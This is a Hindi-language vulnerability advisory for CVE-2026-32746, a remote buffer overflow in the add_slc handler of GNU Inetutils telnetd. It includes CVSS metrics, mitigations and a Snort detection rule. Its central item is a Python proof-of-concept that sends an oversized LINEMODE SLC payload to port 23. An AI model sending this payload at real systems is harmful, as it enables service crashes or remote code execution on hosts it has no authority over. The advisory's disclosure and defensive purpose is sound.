
# CVE-2026-32746 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट GNU Inetutils telnetd में LINEMODE SLC बफर ओवरफ्लो के माध्यम से एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता। इसमें तकनीकी विश्लेषण, CVSS मेट्रिक्स और शमन मार्गदर्शन शामिल है।
गंभीर भेद्यता | CVSS 9.8 | रिमोट कोड निष्पादन!
प्रभावित: GNU Inetutils Telnetd (2.7 से पहले के संस्करण)
प्रकार: LINEMODE SLC सबऑप्शन हैंडलर में OOB Write
हमला वेक्टर: नेटवर्क (पोर्ट 23) | कोई प्रमाणीकरण आवश्यक नहीं
प्रभाव: Telnetd प्रक्रिया विशेषाधिकारों के साथ RCE
GNU Inetutils के telnetd डेमॉन के add_slc फ़ंक्शन में बफर ओवरफ्लो की पहचान की गई है। यह दोष एक दूरस्थ हमलावर को Telnet प्रोटोकॉल के सबऑप्शन में हेरफेर करके करने की अनुमति देता है।
add_slc (स्थानीय वर्ण प्रसंस्करण)।एक हमलावर आंतरिक बफर को संतृप्त करने वाले दुर्भावनापूर्ण Telnet पेलोड के माध्यम से इस भेद्यता का शोषण कर सकता है:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ चेतावनी! यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। बिना प्राधिकरण के सिस्टम पर इसका उपयोग अवैध है।
| मेट्रिक | मान | विवरण |
|---|---|---|
| वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | रिमोट, बिना प्रमाणीकरण |
| स्कोर | 9.8 (गंभीर) 🔴 | गोपनीयता, अखंडता और उपलब्धता पर उच्च प्रभाव |
| प्रकाशन | 13 मार्च, 2026 | अंतिम संशोधन: 5 मई, 2026 |
✅ GNU Inetutils को पैच किए गए संस्करण (post-2.7) में अपडेट करें।
🔹 telnetd अक्षम करें और SSH पर माइग्रेट करें (अनुशंसित)।
🔹 परिधि फ़ायरवॉल में पोर्ट 23 ब्लॉक करें।
🔹 असामान्य LINEMODE SLC अनुक्रमों का पता लगाने के लिए IDS/IPS कॉन्फ़िगर करें।
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)